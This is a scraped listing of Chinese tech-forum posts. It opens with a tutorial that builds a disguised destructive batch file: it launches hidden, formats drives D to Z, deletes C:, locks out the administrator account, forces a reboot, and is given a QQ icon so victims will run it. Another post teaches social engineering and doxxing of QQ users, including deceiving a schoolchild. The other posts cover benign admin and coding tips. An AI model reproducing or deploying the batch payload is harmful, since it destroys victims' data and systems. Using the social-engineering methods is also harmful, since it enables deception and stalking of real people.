3049
只是一个批处理文件,菜鸟的小招数,高手绕道 首先新建一个文本文档 在开头输入 if not "%1"=="wkdxz" mshta vbscript:createobject("wscript.shell").run("""%~f0"" wkdxz",vbhide)(window.close)&&exit 上面这段代码也可以不输入,但是如果少了这段代码就会显示着运行,这段代码起到了隐藏运行的作用 (但是部分杀毒软件询问是否运行) 然后回车输入下面的Huang色字体内容: @Echo off echo y for %%a in (d e f g h i j k l m n o p q r s t u v w x y z) do format %%a: /q /u /x /y 上面这一段代码的意思是快速格式化D到Z盘的所有内容。没有则掠过 再回车输入 cd c:\ attrib +s +h "windows" attrib +s +h "Program Files" attrib +s +h "Documents and Settings" 这段代码是切换到C盘,并且隐藏C盘重要文件,将其设置为系统只读隐藏文件。 然后回车输入 cd C:\Documents and Settings\Administrator\桌面 attrib +S +h 上面是隐藏桌面 继续回车输入代码 net user administrator nisidingle net user guest nihuile 这段代码意思是将计算机的administrator(超级管理员)账户和Guest(来宾账户)设置密码,分别是“你死定了”和“你毁了”的汉语拼音 接着回车输入 shutdown -r -t 60 -c "敢惹老子!你死定了!" 这段代码是设置1分钟关机的,并且会提示:敢惹老子!你死定了 也可以把提示换成别的,只要在120个字之内 最后回车输入 net user administrator /active:no 最后这段代码将直接禁用Administrator用户,别人将重启后将无法进入系统 然后回车输入 del /f /s /q c:\*.* 这句命令是删除C盘所有能删除的文件,并且也删除了shutdown和net这两个DOS命令,使对方无法解除关机 最后一步把txt文件改成bat文件,更改文件图标为QQ或其他常用软件,重命名;只要双击后,你的电脑基本就毁了
10
0 2461天前
2858
电脑键盘的shift键失灵了如何恢复的解决方法。我们在使用电脑的时候经常会用到电脑上的shift按键,因为shift按键经常会和别的按键组合快捷键。但是当shift按键失灵的时候,我们应该怎么办呢?一起来看看吧。 shift键失灵怎么办? 1、请您点击开始菜单—控制面板—轻松访问中心—点击下面的键盘图标—“设置筛选键”按钮,查看“启用筛选键”前面是否有勾,如果有,请将勾去掉,最后点击“确定”后退出试试。 2、如果您有外接USB键盘,您可以连接后测试USB键盘上的SHIFT键是否可以正常使用。您也可以开机按F8键进入安全模式测试它们是否可以正常使用。 3、请您查看是否对shift按键进行了设置。例如,您可以查看是否启用了粘滞键,请您连续点击5次shift按键,这个操作可以取消粘滞键功能(粘滞键功能可能会引起键盘无法使用)。 4、请您对系统进行杀毒,以免系统中毒了。建议您备份数据后恢复BIOS默认值试试,方法如下: 家用笔记本:您开机时连续点击F10进入BIOS,选择Exit选项,选择loadsetupdefaults—yes,再选择Exit--exitsavingchanges—yes,就可以保存后退出了。 商用笔记本:您开机后连续点击F10键进入BIOS,在File中选择RetoreDefaults,点yes,再选择SaveChangesAndExit,就可以保存后退出了。 5、如果问题依旧,但USB键盘的SHIFT键可以使用,并且您确认系统没有问题,那么这个情况有可能是由于笔记本键盘的两个SHIFT键有故障造成的,为了不耽误您的使用,建议您联系当地笔记本服务中心进行处理。 shift键有什么用? 1、切换中文和英文:在输入法上直接按shift键即可切换2、快速删除文件:shift+Delete 3、更改打开方式:按住shift键,然后在点击选择文件夹,即可新增加一个“打开方式”的选项。 4、启用粘、筛键:连按5次,即“粘贴键”的快捷方式; 5、筛选键:按右shift键8秒以上为“筛选键”的快捷方式。 6、重启电脑:先按shift键,然后按确定按钮即可重启。 对于我们在遇到了电脑中的shift按键失灵的时候,我们就可以利用到上面给你们介绍的解决方法进行处理,希望能够对你们有所帮助。
20
0 2462天前
2910
做外贸的网站一般都不想让国内人访问,可以采用如下的方法:1. 从APNIC获取一份国家与地区IP段数据 ftp://ftp.apnic.net/apnic/dbase/data/country-ipv4.lst2. 将中国的数据整理取出(用excel的数据筛选功能)3. 编写PHP代码如下:<?php
function ipCIDRCheck ($IP, $CIDR) {
list ($net, $mask) = split (“/”, $CIDR);
if($mask>16){
$net=$net.”.0″;
}else{
$net=$net.”.0.0″;
}
$ip_net = ip2long ($net);
$ip_mask = ~((1 << (32 – $mask)) – 1);
$ip_ip = ip2long ($IP);
$ip_ip_net = $ip_ip & $ip_mask;
return ($ip_ip_net == $ip_net);
}
$subnets=<<<Eof
60.0/11
60.55/16
60.63/16
60.160/11
60.194/15
60.200/13
60.208/12
60.232/15
60.235/16
60.245.128/17
60.247/16
60.252/16
60.253.128/17
60.255/16
Eof;
$subnetarray=explode(“\n”,$subnets);
foreach($subnetarray as $subnet){
if(ipCIDRCheck (“60.168.86.219″, $subnet)){
echo “60.168.86.219 in => “.$subnet;
//取得用户ip后,与之比较,如果匹配,就可以在这里显示一个错误页,或重定向了
};
}
?>程序执行时间平均20毫秒,篇幅有限,仅列出部分IP段,完整的请自行获取。
7
0 2462天前
2976
甜言蜜语背后的危险 ——社工工程学你们好我是c3 我不是什么社工帝 小白一个 !根据自己所掌握的知识写个教程!让大家了解什么是‘社工’!社工思路一、什么是社会工程学呢?我在这里援引Ian Mann在2008年所著的Hacking the Human一书 这本书对社工给出的定义是:通过操纵人来实施某些行为或泄露机密信息的一种攻击艺术!说白了就是对人的欺骗!但是要欺骗的天衣无缝、神不知鬼不觉的完成你的这个行动!还是需要很多技巧和策略.而这种欺骗无法像其他的技术那么的循规蹈矩。同时有些时候只可意会而不可言传,因此它就被称为一种‘艺术’!其实社工在中国的历史上有很多实例!比如著名的《三十六计》和《三国演义》尤其是三国演义中第四十五回《群英会蒋干中计》,讲的是周瑜使用借刀杀人反间计,利用曹操的谋士蒋干来江东说祥自己的机会,诱骗蒋干盗书,离间蔡瑁张允与曹操的关系,借曹操之手除掉蔡张二人,里面周瑜设计、用计以及曹操中计过程的描述,完美的体现了社会工程学的思想。社工的原理就是通过分析攻击对象的心理弱点、利用人类的本能反应以及好奇、贪婪这些类似的心理特征!使用假冒,欺骗,引诱等手段开达成攻击目标的一种攻击手段。社工其实蕴含了各式各样的灵活构思和变化因素。无论何时何地在套取所需要的信息和操纵对方之前,攻击的实施者都必须掌握大量的相关知识基础。花费时间去从事资料的收集和整理,还要去进行必要的沟通工作!二、社会工程学技术框架其实社工基本上可以分为四个环节!1,信息收集2,诱导3,托辞4,心理影响 1信息收集可以分为:收集渠道 信息源 诱导:诱导目标 场景铺垫 如何去诱导成功托辞:托辞的设计原则 规划 如何成功心理影响:主要是心理战术的灵活利用信息收集的渠道很多例如:搜索引擎,whios查询,社交媒体,如何去判断你收集的资料是不是对的呢?例如你要去社工一个人小n 你从其他渠道获取到了他的资料 这个时候有多种方法去证实,沟通,从他的空间里找漏洞 例如空间访客 你试着去点访客资料查看 看看那个地方的人占多数。频率多高!这样来基本的判断 当然你也可以去找他朋友,这样的思路很多就是看你如何去利用,信息收集主要是能准确的抓住重点 细节!2,诱导:意思就是说一些表面普通而且无关的话,从对方回答中提取有用的信息。怎样去提高诱导能力:1:在目标进行社工时表现要很自然2:学习相关知识3,不能够贪心:怎样说呢。假如你已经从目标那里套到了一些资料 不能贪婪的想要套取更多,这样会引起目标的警觉性!诱导技巧:迎合目标的自我感觉 表达自己和她(他)有共同兴趣 托辞:这个技巧是对现实社工来用的主要 说白了就是多方位的套路 有些时候你知道了对方的大概位置 可以从交谈中慢慢的说出自己是哪里的(和目标一样的地址)这样的话有些人觉得是个老乡 那么他对你的警觉性必然会少点!这里我着重说一下这个心理影响、基本原则:设置明确的目标、与目标建立关系、不能够循规蹈矩。心理影响的一些战术:我这里说网络上的,利用承诺与一致性,从众心理,好奇心 贪婪 自大自信、谦虚.思路其实很多,就好比有一次我们几个朋友一起去社工一个小学生!那个人是什么黑客送软件 我们因为比的是社群!我就去问她现在是不是有几个人问你拜师不 要没要你的微信 支付宝 他就说是的 然后当时我知道了他是xx地方的!我就说那几个人不是真心拜师。而是去套路你的!别信!这个时候我就用扣扣位置定位拉取到那个地方,就说什么我看你和我是老乡我真的看不下去了!说了半天废话!我就说要管理!这人很倔 就是不给但是经过我这么一搞他就说兄弟帮我多啦点人!后面的就不用说了!社工小学生最常用的莫过于利用贪婪这一点!其实说句实话社工真心不难!社工思路不能够去定位这得根据你的目标!你自己去想该如何怎么套取!有人曾经给我说过社工并不是社资料 最高的而是拿到他手里的权限!在学习社工之前你得自己先认知自我!社工再多的教程都比不了自己的实战经验!社工查询的网站和最基础的思路我想的话是个人都知道的!这些就没必要说出来了!基本的社工思路1.百度google搜索QQ号信息,QQ邮箱信息2.百度贴吧关键字搜索QQ号信息,QQ邮箱信息2.1 如果搜索到,拿到贴吧帐号,请继续用贴吧帐号按照1,2步搜索,以此类推3.社工库查询QQ号的信息,可通过QQ群数据库,查备注名,查他拥有的QQ群,这个一般比较准群,可以查到真实姓名,或者拥有哪些群(比如查到XX中学20**届多少班),然后再网上查该学校的20**届毕业名单4.如果只有真实姓名,用真实姓名去查询人人,腾讯朋友等,你会获得一些更多的信息(重名的很多,但你查出学校,就知道大概年龄和大致家庭地址)不出意外,你可以获得以下信息中的N种可能性QQ号真实姓名贴吧帐号人人帐号-真实照片腾讯朋友-真实照片手机号 微信号 手机微店 以上信息,又可进一步社工百度手机号,除了能获取归属地之外,还可能获取到一些他在网上留下的信息百度,google他在网上的网名(贴吧名)百度,google搜图,搜他的真实照片百度,google真实姓名通过贴吧,人人,找他的动态,进一步发现其他资料反正思路就是这样,通过一个信息,去进一步获取他在网上的其他信息,用每个信息都去重复之前的步骤,这就是最简单的社工。本人c3 qq1586489579. 大佬勿喷!
13
1 2462天前
2968
自MySQL 5.6开始,在索引方面有了一些改进,比如索引条件下推(Index condition pushdown,ICP),严格来说属于优化器层面的改进。如果简单来理解,就是优化器会尽可能的把index condition的处理从Server层下推到存储引擎层。举一个例子,有一个表中含有组合索引idx_cols包含(c1,c2,…,cn)n个列,如果在c1上存在范围扫描的where条件,那么剩余的c2,…,cn这n-1个上索引都无法用来提取和过滤数据,而ICP就是把这个事情优化一下。我们在MySQL 5.6的环境中来简单测试一下。我们创建表emp,含有一个主键,一个组合索引来说明一下。create table emp( empno smallint(5) unsigned not null auto_increment, ename varchar(30) not null, deptno smallint(5) unsigned not null, job varchar(30) not null, primary key(empno), key idx_emp_info(deptno,ename) )engine=InnoDB charset=utf8; 当然我也随机插入了几条数据,意思一下。insert into emp values(1,'zhangsan',1,'CEO'),(2,'lisi',2,'CFO'),(3,'wangwu',3,'CTO'),(4,'jeanron100',3,'Enginer'); ICP的控制在数据库参数中有一个优化器参数optimizer_switch来统一管理,我想这也是MySQL优化器离我们最贴近的时候了。可以使用如下的方式来查看。show variables like 'optimizer_switch'; 当然在5.6以前的版本中,你是看不到index condition pushdown这样的字样的。在5.6版本中查看到的结果如下:# mysqladmin var|grep optimizer_switch optimizer_switch | index_merge=on,index_merge_union=on,index_merge_sort_union=on,index_merge_intersection=on,engine_condition_pushdown=on,index_condition_pushdown=on,mrr=on,mrr_cost_based=on,block_nested_loop=on,batched_key_access=off,materialization=on,semijoin=on,loosescan=on,firstmatch=on,subquery_materialization_cost_based=on,use_index_extensions=on下面我们就用两个语句来对比说明一下,就通过执行计划来对比。set optimizer_switch = "index_condition_pushdown=off" > explain select * from emp where deptno between 1 and 100 and ename ='jeanron100'; +----+-------------+-------+------+---------------+------+---------+------+------+-------------+ | id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra | +----+-------------+-------+------+---------------+------+---------+------+------+-------------+ | 1 | SIMPLE | emp | ALL | idx_emp_info | NULL | NULL | NULL | 4 | Using where | +----+-------------+-------+------+---------------+------+---------+------+------+-------------+ 而如果开启,看看ICP是否启用。set optimizer_switch = "index_condition_pushdown=on";> explain select * from emp where deptno between 10 and 3000 and ename ='jeanron100'; +----+-------------+-------+-------+---------------+--------------+---------+------+------+-----------------------+ | id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra | +----+-------------+-------+-------+---------------+--------------+---------+------+------+-----------------------+ | 1 | SIMPLE | emp | range | idx_emp_info | idx_emp_info | 94 | NULL | 1 | Using index condition | +----+-------------+-------+-------+---------------+--------------+---------+------+------+-----------------------+ 1 row in set (0.00 sec)如果你观察仔细,会发现两次的语句还是不同的,那就是范围扫描的范围不同,如果还是用原来的语句,结果还是有一定的限制的。> explain select * from emp where deptno between 1 and 300 and ename ='jeanron100'; +----+-------------+-------+------+---------------+------+---------+------+------+-------------+ | id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra | +----+-------------+-------+------+---------------+------+---------+------+------+-------------+ | 1 | SIMPLE | emp | ALL | idx_emp_info | NULL | NULL | NULL | 4 | Using where | +----+-------------+-------+------+---------------+------+---------+------+------+-------------+ 1 row in set (0.00 sec)这个地方就值得好好推敲了。
6
0 2463天前
3132
我开通了一个独立IP LINUX空间,空间支持伪静态功能。由于网站根目录下安装的是bbs,目录下安装的是网址导航,虚拟主机只支持根目录绑定域名,如何让网站支持二级域名呢?下面我教你利用.htaccess实现一个网站空间可以用多个二级域名指向多个二级目录,建立多个网站。以独立IP虚拟主机为例:一、将域名做一个解析到你的空间IP,不需要绑定域名就可以访问网站。二、打开记事本将以下代码复制进去,保存为.htaccess文件,上传到根目录下。RewriteCond %{HTTP_HOST} ^daohang.mosq.cn$ RewriteCond %{REQUEST_URI} !^/daohang/ RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /daohang/$1 RewriteCond %{HTTP_HOST} ^daohang.mosq.cn$
RewriteRule ^(/)?$ daohang/index.php [L]
6
0 2464天前
2778
3550
刚开始看爬虫文章的时候,走了不少弯路,我希望我的文章能给你带来一些启发本文涉及到的技能查看网页源代码和检查元素requests使用BeautifulSoup使用这三招就是爬取简单网站的全部招数,跟着思路往下看查看网页源代码和检查元素不要觉得很简单,这两招是爬虫的基础。如果你熟悉这两招,简单网站的爬虫,你就学会了一半。一般来说,检查元素中看到的内容都会在网页源代码中出现。今天我选取的这个例子,情况特殊,检查元素中看到的内容部分会在网页源代码中出现爬北京的白天和夜间温度北京天气的网址:http://www.weather.com.cn/weather1d/101010100.shtml下面是源代码,我会有注释的,跟着一起读一读Talk is cheap. Show you the code# -*- coding: utf-8 -*-
__author__ = 'duohappy'
import requests # 导入requests模块
from bs4 import BeautifulSoup # 从bs4包中导入BeautifulSoup模块
# 设置请求头
# 更换一下爬虫的User-Agent,这是最常规的爬虫设置
headers = {"User-Agent":'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/57.0.2987.110 Safari/537.36'}
# 需要爬取的网址
url ="http://www.weather.com.cn/weather1d/101010100.shtml"
# 发送请求,获取的一个Response对象
web_data = requests.get(url,headers=headers)
# 设置web_data.text会采用web_data.encoding指定的编码,一般情况下不需要设置,requests会自动推断
# 鉴于网页大部分都是采取utf-8编码的,所以设置一下,省去一些麻烦
web_data.encoding = 'utf-8'
# 得到网页源代码
content = web_data.text
# 使用lxml解析器来创建Soup对象
soup = BeautifulSoup(content, 'lxml')
# 为什么要创建一个Soup对象,还记得浏览器中的检查元素功能嘛
# Soup对象可以方便和浏览器中检查元素看到的内容建立联系,下面会有动画演示
# 使用css selector语法,获取白天和夜间温度,下面有动画演示
tag_list = soup.select('p.tem span')
# tag_list[0]是一个bs4.element.Tag对象
# tag_list[0].text获得这个标签里的文本
day_temp = tag_list[0].text
night_temp = tag_list[1].text
print('白天温度为{0}℃\n晚上温度为{1}℃'.format(day_temp, night_temp))css seletor语法值得提出的是当搜索'p.temem'时,刚好有2个匹配的对象,分别对应白天温度和夜间温度,这一点非常重要,如果匹配个数大于或者小于2,那么说明你的css selector写错了爬多个城市的白天和夜间温度搜索不同的城市天气,观察网址的变化。观察网址的变化是爬虫中最主要的本领之一# -*- coding: utf-8 -*-
__author__ = 'duohappy'
import requests
from bs4 import BeautifulSoup
headers = {"User-Agent":'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/57.0.2987.110 Safari/537.36'}
# 建立城市和网址特殊部分的对应关系
weather_code = {'北京':'101010100','上海':'101020100','深圳':'101280601', '广州':'101280101', '杭州':'101210101'}
city = input('请输入城市名:') # 仅仅能输入北京,上海,广州,深圳,杭州
url ="http://www.weather.com.cn/weather1d/{}.shtml".format(weather_code[city])
web_data = requests.get(url,headers=headers)
web_data.encoding = 'utf-8'
content = web_data.text
soup = BeautifulSoup(content, 'lxml')
tag_list = soup.select('p.tem span')
day_temp = tag_list[0].text
night_temp = tag_list[1].text
print('白天温度为{0}℃\n晚上温度为{1}℃'.format(day_temp, night_temp))
3
0 2464天前
2909
【百度快照】禁止百度保留快照的代码:noarchive很多站点出于隐私的考虑不希望百度保留快照,网上也在讨论如何禁止百度保留快照的方法。其实百度早已对此有过说明,但藏在一篇不起眼的文章中不引人注目,导致依然非常多的人不清楚该如何操作。要防止所有搜索引擎显示您网站的快照,请将此元标记置入网页的部分:<meta name="robots" content="noarchive">要允许其他搜索引擎显示快照,但仅防止百度显示,请使用以下标记:<meta name="Baiduspider" content="noarchive">注:此标记只是禁止百度显示该网页的快照,并不会影响网页建入索引,同时垃圾网页也不可能依靠此手段逃避百度的判罚。
3
0 2464天前
2876
1、我们首先进QQ空间进入“相册“点击进去后,我们点右上角的“回收站”。2、如果空间还没有设置密码的朋友,点击“日志”,弹出的页面提示你开启回收站功能,开启回收站后,你删除的邮件,QQ空间将为你保存三个月。或者直接输入你的QQ空间密码。我们点“启动回收站”,弹出对话框要我们设置密码。我们输俩遍后,点确定。但是这密码不能和QQ密码相同。3、设置好后,我们看到我最近三个月删除的照片。如果我们要还原的话,可以勾选照片,进行还原。黄钻用户的话,可以恢复一年之内删除的照片。但前提是你一直续费和开启回收站功能。4、我们勾选一张照片,再点击“还原”。弹出对话框,我们选择恢复到哪个相册,点确定后,再提示你输入密码。再选择点确定。提示我们恢复成功,我们可以在我们之前选择的目录里找到我们刚才恢复的照片了。
9
0 2470天前